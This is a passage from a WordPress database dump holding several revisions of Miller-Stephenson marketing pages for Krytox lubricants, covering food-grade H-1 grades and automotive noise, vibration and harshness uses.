href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox XHT-ACX</a></td>\r\n<td>Bearings and chains</td>\r\n<td>Krytox XHT-AC and ACX contain corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Lubricating Oils</td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox GPL 105</a>\r\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox XHT-500</a>\r\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox XP-1A5</a>\r\nKrytox FG 40</td>\r\n<td>Chains, compressors, bearings, gear boxes</td>\r\n<td>Krytox XHT-500 is formulated for high temperatures; Krytox XP-1A5 contains corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox 1506</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox 1514</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox 1525</a></td>\r\n<td>Mechanical pumps</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="NSF Food Grade Lubricants" ]', 'Krytox H-1 Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', '2442-revision-v1', '', '', '2016-10-10 14:43:39', '2016-10-10 14:43:39', '', 2442, 'https://www.miller-stephenson.com/2442-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2448, 2, '2016-10-10 14:44:42', '2016-10-10 14:44:42', '<strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong>\r\n\r\nChoosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox food grade lubricants from Miller-Stephenson.\r\n\r\nAs with the full line of Krytox lubricants, Krytox oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.\r\n\r\nThe composition of Krytox lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.\r\n\r\nKrytox lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.\r\n\r\n<strong>Stability and Compatibility</strong>\r\nKrytox oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break\r\ndown in the presence of most chemicals.\r\n\r\nBecause Krytox food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox lubricants will not break down under extreme pressure or high mechanical stress.\r\n\r\nVarious grades of Krytox food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.\r\n\r\nUse Krytox lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.\r\n\r\n<strong>Safety and Environmental Protection</strong>\r\n\r\nUsing Krytox greases and oils:\r\n<ul>\r\n 	<li>Reduces the need for hydrocarbon lubricants</li>\r\n 	<li>Helps allay any concerns about emissions or other potential environmental impact</li>\r\n 	<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\r\n</ul>\r\nKrytox greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.\r\n\r\n<img class="alignnone wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" />\r\n\r\n<strong>Benefits in Use</strong>\r\n\r\nThe extended life you will see with Krytox lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox lubricants. In addition, because Krytox lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.\r\n\r\nThe combination of all of these factors translates to long-term cost savings for your business.\r\n\r\n<img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" />\r\n\r\n<strong>Applications for Krytox H-1 Food Grade Lubricants</strong>\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Type</strong></td>\r\n<td width="206"><strong>Products</strong></td>\r\n<td width="206"><strong>Application</strong></td>\r\n<td width="206"><strong>Comments</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox GPL 202</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox GPL 203</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox GPL 205</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox GPL 206</a></td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox GPL 223</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox GPL 225</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox GPL 226</a>\r\nKrytox FG 34</td>\r\n<td>Bearings, valves, seals, O-rings</td>\r\n<td>For non-corrosive environments at standard operating temperatures</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox XHT-SX</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox XHT-AC</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox XHT-ACX</a></td>\r\n<td>Bearings and chains</td>\r\n<td>Krytox XHT-AC and ACX contain corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td width="250">Lubricating Oils</td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox GPL 105</a>\r\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox XHT-500</a>\r\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox XP-1A5</a>\r\nKrytox FG 40</td>\r\n<td>Chains, compressors, bearings, gear boxes</td>\r\n<td>Krytox XHT-500 is formulated for high temperatures; Krytox XP-1A5 contains corrosion inhibitor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox 1506</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox 1514</a>\r\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox 1525</a></td>\r\n<td>Mechanical pumps</td>\r\n<td></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="NSF Food Grade Lubricants" ]', 'Krytox H-1 Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', '2442-revision-v1', '', '', '2016-10-10 14:44:42', '2016-10-10 14:44:42', '', 2442, 'https://www.miller-stephenson.com/2442-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2449, 2, '2016-10-10 14:46:13', '2016-10-10 14:46:13', '<p><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox</a> NSF H-1 Food Grade Lubricants - Safe for Incidental Food Contact</strong></p>\n<p>Choosing the right lubricant for your equipment just got a lot easier with H-1 certified Krytox food grade lubricants from Miller-Stephenson.</p>\n<p>As with the full line of Krytox lubricants, Krytox oils and greases deliver superior performance with advanced features of high-temperature stability, nonflammability, and chemical and biological inertness. Krytox lubricants will not carbonize or form gummy deposits that typically cause failures, nor will they evaporate. Therefore, maintenance costs can be significantly reduced.</p>\n<p>The composition of Krytox lubricants allows them to function in a wide range of operating temperatures and chemical environments. Krytox food grade lubricants will not break down under mechanical stress. The oils are clear, colorless, and odorless, and the grease is white.</p>\n<p>Krytox lubricants comply fully with USDA performance standards for designated uses. These lubricant products are not intended to be used as direct food additives. Use Krytox oils and greases whenever a long-lasting, tenacious, chemically inert lubricant is needed for your demanding applications.</p>\n<p><strong>Stability and Compatibility</strong><br />\nKrytox oils contain only carbon, oxygen, and fluorine. The oils will not burn or support combustion, even in 100% liquid or gaseous oxygen. They are chemically inert and will not break<br />\ndown in the presence of most chemicals.</p>\n<p>Because Krytox food grade lubricants are essentially inert, they are safe to use with most metals, plastics, and seal materials, and they are completely resistant to water and steam. Krytox lubricants protect bearings and other components under a wide range of load and speed conditions. Components run quieter, and wear protection is extended. Krytox lubricants will not break down under extreme pressure or high mechanical stress.</p>\n<p>Various grades of Krytox food grade lubricants are serviceable for long periods of time at continuous temperatures between –60–300 °C (–58–600 °F). There are also special grades that can routinely handle temperatures of 350 °C (662 °F) and withstand peaks up to 400 °C (752 °F) for shorter periods of time.</p>\n<p>Use Krytox lubricants on chains, bearings, valves, seals, or any place a long-lasting lubricant is needed.</p>\n<p><strong>Safety and Environmental Protection</strong></p>\n<p>Using Krytox greases and oils:</p>\n<ul>\n<li>Reduces the need for hydrocarbon lubricants</li>\n<li>Helps allay any concerns about emissions or other potential environmental impact</li>\n<li>Avoids the inconvenience and cost associated with the disposal of hydrocarbon-based oils and greases.</li>\n</ul>\n<p>Krytox greases and oils are non-toxic, easy to handle, and do not release volatile organic compounds to the atmosphere. Additionally, Chemours has a regeneration program that reclaims used oil and restores it to its original properties. This lowers the overall cost of lubrication, and eliminates safety and environmental disposal problems.</p>\n<p><img class="alignnone wp-image-2443" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Krytox-Hydrocarbon.jpg" alt="krytox-hydrocarbon" width="349" height="364" /></p>\n<p><strong>Benefits in Use</strong></p>\n<p>The extended life you will see with Krytox lubricants means longer re-lubrication intervals, less maintenance, and improved cleanliness. The overall superior stability of Krytox lubricants also can result in less downtime and fewer failures due to lubricant carbonization, evaporation, or other deterioration. Water washout and steam cleaning will not affect Krytox lubricants. In addition, because Krytox lubricants can be used in many applications and last so long, your total lubricant inventory can be reduced, as well as the need for frequent movement of drums around your facility.</p>\n<p>The combination of all of these factors translates to long-term cost savings for your business.</p>\n<p><img class="alignnone size-medium wp-image-2444" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/krytox-comparison-800x311.jpg" alt="krytox-comparison" width="800" height="311" /></p>\n<p><strong>Applications for Krytox H-1 Food Grade Lubricants</strong></p>\n<table width="868">\n<tbody>\n<tr>\n<td width="250"><strong>Type</strong></td>\n<td width="206"><strong>Products</strong></td>\n<td width="206"><strong>Application</strong></td>\n<td width="206"><strong>Comments</strong></td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/">Multipurpose Greases</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-202/">Krytox GPL 202</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-203/">Krytox GPL 203</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox GPL 205</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-206/">Krytox GPL 206</a></td>\n<td>Bearings, valves, seals, O-rings</td>\n<td>For non-corrosive environments at standard operating temperatures</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">Anti-Corrosion Greases</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-223/">Krytox GPL 223</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox GPL 225</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-gpl-226/">Krytox GPL 226</a><br />\nKrytox FG 34</td>\n<td>Bearings, valves, seals, O-rings</td>\n<td>For non-corrosive environments at standard operating temperatures</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/">High-Temperature Greases</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-xht-sx/">Krytox XHT-SX</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox XHT-AC</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-xht-acx/">Krytox XHT-ACX</a></td>\n<td>Bearings and chains</td>\n<td>Krytox XHT-AC and ACX contain corrosion inhibitor</td>\n</tr>\n<tr>\n<td width="250">Lubricating Oils</td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox GPL 105</a><br />\n<a href="https://www.miller-stephenson.com/product/xht-500/">Krytox XHT-500</a><br />\n<a href="https://www.miller-stephenson.com/product/xp-1a5/">Krytox XP-1A5</a><br />\nKrytox FG 40</td>\n<td>Chains, compressors, bearings, gear boxes</td>\n<td>Krytox XHT-500 is formulated for high temperatures; Krytox XP-1A5 contains corrosion inhibitor</td>\n</tr>\n<tr>\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\n<td width="206"><a href="https://www.miller-stephenson.com/product/krytox-vpf-1506/">Krytox 1506</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1514/">Krytox 1514</a><br />\n<a href="https://www.miller-stephenson.com/product/krytox-vpf-1525/">Krytox 1525</a></td>\n<td>Mechanical pumps</td>\n<td></td>\n</tr>\n</tbody>\n</table>\n<p>&nbsp;</p>\n[ux_product_categories ids="46,115,38" number="10"]', 'Krytox H-1 Food Grade Lubricants', '', 'inherit', 'closed', 'closed', '', '2442-revision-v1', '', '', '2016-10-10 14:46:13', '2016-10-10 14:46:13', '', 2442, 'https://www.miller-stephenson.com/2442-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2450, 2, '2016-10-10 15:36:06', '2016-10-10 15:36:06', '<strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/">Krytox™</a> Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues.</strong>\r\n\r\nInside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.\r\n\r\nBecause these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.\r\n\r\nKrytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.\r\n\r\nKrytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.\r\n\r\n<strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.\r\n\r\nKrytox™ Value\r\n<ul>\r\n 	<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\r\n 	<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\r\n 	<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\r\n</ul>\r\n<strong>Application Guidance</strong>\r\n\r\nThe typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:\r\n<ol>\r\n 	<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\r\n 	<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\r\n</ol>\r\n<strong>Application Examples</strong>\r\n\r\nAutomakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.\r\n\r\nHere are just a few of the many pain points Krytox™ has been proven to help silence:\r\n<ul>\r\n 	<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming sticky over time.</li>\r\n 	<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\r\n 	<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\r\n 	<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration\r\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\r\n</ul>\r\n<img class="alignnone size-medium wp-image-2452" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness-800x455.jpg" alt="noise-vibration-harshness" width="800" height="455" />\r\n\r\n<strong>Application Systems</strong>\r\n\r\nThere are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.\r\n\r\nUse of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.\r\n\r\nChoose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.\r\n\r\n[ux_product_categories ids="46,37,45" number="10"]\r\n\r\nKrytox™ is  a trademark of The Chemours Company FC, LLC.', 'Krytox For Automotive Noise, Vibration, and Harshness', '', 'publish', 'closed', 'closed', '', 'krytox-noise-vibration-harshness', '', '', '2016-10-12 19:48:13', '2016-10-12 19:48:13', '', 0, 'https://www.miller-stephenson.com/?p=2450', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2451, 2, '2016-10-10 15:27:51', '2016-10-10 15:27:51', 'Krytox™ Lubricants Can Help Solve Your Customer’s Toughest Complaints.\r\n\r\nInside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.\r\n\r\nBecause these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.\r\n\r\nKrytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.\r\n\r\nKrytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.\r\n\r\n<strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.\r\n\r\nKrytox™ Value\r\n<ul>\r\n 	<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\r\n 	<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\r\n 	<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\r\n</ul>\r\n<strong>Application Guidance</strong>\r\n\r\nThe typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:\r\n<ol>\r\n 	<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\r\n 	<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\r\n</ol>\r\n<strong>Application Examples</strong>\r\n\r\nAutomakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.\r\n\r\nHere are just a few of the many pain points Krytox™ has been proven to help silence:\r\n<ul>\r\n 	<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming sticky over time.</li>\r\n 	<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\r\n 	<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\r\n 	<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration\r\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\r\n</ul>\r\n<strong>Application Systems</strong>\r\n\r\nThere are several manufacturers of equipment that can be used for these applications. The systems can be purchased from one source or fabricated locally from many sources. Automatic dispensing systems for adhesives, sealants, or lubricants can be used as the supply system. Manufacturers such as GRACO, Hydrotech, LCC-Dispensit, or a local distributor can provide controlled application systems for precise dispensing.\r\n\r\nUse of disposable foam tips or brushes can allow accurate coverage of most shapes. Companies such as Designetics or others can provide help in this area.\r\n\r\nChoose Krytox™ for long-lasting lubrication that helps improve vehicle performance and customer satisfaction.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—performance lubricants from Chemours can help. At Chemours, we put our science to work to produce lubricants that can stand up to today’s engineering design demands—no matter how tough the conditions. It’s reliability you can count on, from a name you trust.', 'Krytox For Automotive Noise, Vibration, and Harshness', '', 'inherit', 'closed', 'closed', '', '2450-revision-v1', '', '', '2016-10-10 15:27:51', '2016-10-10 15:27:51', '', 2450, 'https://www.miller-stephenson.com/2450-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2452, 2, '2016-10-10 15:32:57', '2016-10-10 15:32:57', '', 'noise-vibration-harshness', '', 'inherit', 'closed', 'closed', '', 'noise-vibration-harshness', '', '', '2016-10-10 15:32:57', '2016-10-10 15:32:57', '', 2450, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2453, 2, '2016-10-10 15:34:23', '2016-10-10 15:34:23', '', 'noise vibration harshness', '', 'inherit', 'closed', 'closed', '', 'shutterstock_420231835', '', '', '2016-10-10 15:34:40', '2016-10-10 15:34:40', '', 2450, 'https://www.miller-stephenson.com/wp-content/uploads/2016/10/shutterstock_420231835.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2454, 2, '2016-10-10 15:36:06', '2016-10-10 15:36:06', '<strong>Krytox™ Lubricants Can Help Solve Your Automotive Noise, Vibration, and Harshness issues.</strong>\r\n\r\nInside an automobile’s interior, there are a variety of places where different materials come into contact with one another. Examples include metal on plastic, leather on leather, weather stripping, and many others. Movement between these surfaces often results in a series of noises typically described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises with just a small amount of lubricant at the interface.\r\n\r\nBecause these applications are intended to be a one-time application, it is important to choose a lubricant that is easy to apply, has low volatility, and will remain in place over the normal useful life of the vehicle. Krytox™ oils and greases are the answer.\r\n\r\nKrytox™ oils and greases stand up to harsh environments and high temperatures to lubricate weather stripping and parts prone to noise and wear. Krytox™ prevents weather stripping from cracking, shrinking, and swelling to help reduce wind noise, drafts, and water leakage. And, when used on moving parts, Krytox™ lubricants can minimize the shock and stress that cause squeaks, rattles, and damage.\r\n\r\nKrytox™ oils and greases are compatible with a wide variety of materials, and they have the frictional and long life characteristics that make them ideal lubricants in noise, vibration, and harshness applications.\r\n\r\n<strong>Oils and Greases That Really Work in Demanding Real-Life Applications</strong>\r\n\r\nReliable high-performance fluoropolymer lubricants from Chemours can prevent unwanted noises without relubrication. Krytox™ oils and greases are easy to apply, have low volatility, and are long-lasting in aggressive environments.\r\n\r\nKrytox™ Value\r\n<ul>\r\n 	<li>Long-lasting, cost effective lubrication— Krytox™ prevents unwanted noises without re-lubrication. And, Krytox™ stays put, so you can apply a small amount without fear of migration.</li>\r\n 	<li>Material compatibility—Because Krytox™ is compatible with metals, elastomers, and engineering plastics, it won’t damage the components, allowing them to last as designed. • Chemical compatibility and environmental safety—Krytox™ lubricants are chemically, biologically, and environmentally inert, as well as silicone-free. And, they contain no hazardous volatile organic compound materials or chlorine.</li>\r\n 	<li>Lubricity—Krytox™ provides excellent lubricity because of its low coefficient of friction and low surface energy; and because it doesn’t oxidize, it won’t turn sticky or change color.</li>\r\n</ul>\r\n<strong>Application Guidance</strong>\r\n\r\nThe typical coverage for Krytox™ when properly applied is approximately 4 g/m2. Most applications are less than 0.2 g. Each application must be considered separately in order to ensure the best solution is found. There are two main components of any application method:\r\n<ol>\r\n 	<li>Controlled metering of the material from the container to the applicator. This is best done automatically to ensure accuracy and repeatability.</li>\r\n 	<li>Transfer of the material from the applicator to the component. This can be either a manual application, using a brush or foam applicator, or automatically—either by spraying or wiping by robot or specially designed jig.</li>\r\n</ol>\r\n<strong>Application Examples</strong>\r\n\r\nAutomakers from around the world have a long history of using Krytox™ oils and greases to help eliminate automotive squeaks and rattles.\r\n\r\nHere are just a few of the many pain points Krytox™ has been proven to help silence:\r\n<ul>\r\n 	<li>Leather trim, seats, and console parts—Leather-onleather friction can create an irritating noise. Krytox™ gets rid of the itch without staining the leather or becoming sticky over time.</li>\r\n 	<li>Plastic door panel and metal frame—Because Krytox™ is compatible with metals, elastomers, and plastics, it effectively silences noise caused by the interaction of various materials. And, Krytox™ won’t oxidize or discolor plastic. Apply by spraying by hand or using a robot.</li>\r\n 	<li>Rubber gaskets and seals—A thin film of Krytox™ can lubricate sliding contact in convertible tops, sunroofs, trunk lids, and doors to keep the rubber compound in good condition, and protected from oxidation. Grease or oil can be applied by hand, or a jig can be used to guide the application.</li>\r\n 	<li>Window lift systems and weather stripping—Krytox™ can stop weather strip “bunching” and “gathering,” and help eliminate the wind noise produced as window glass is raised. Awkward configuration\r\nof these seals usually means that automatic application is difficult. An automatic dispenser in conjunction with disposable foam applicators is often used. The amount can be controlled by ensuring a preset quantity is dispensed directly from the supply onto the applicator.</li>\r\n</ul>\r\n<img class="alignnone size-medium wp-image-2452" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/noise-vibration-harshness-800x455.jpg" alt="noise-vibration-harshness" width="800" height="455" />\r\n\r\n<strong>Application 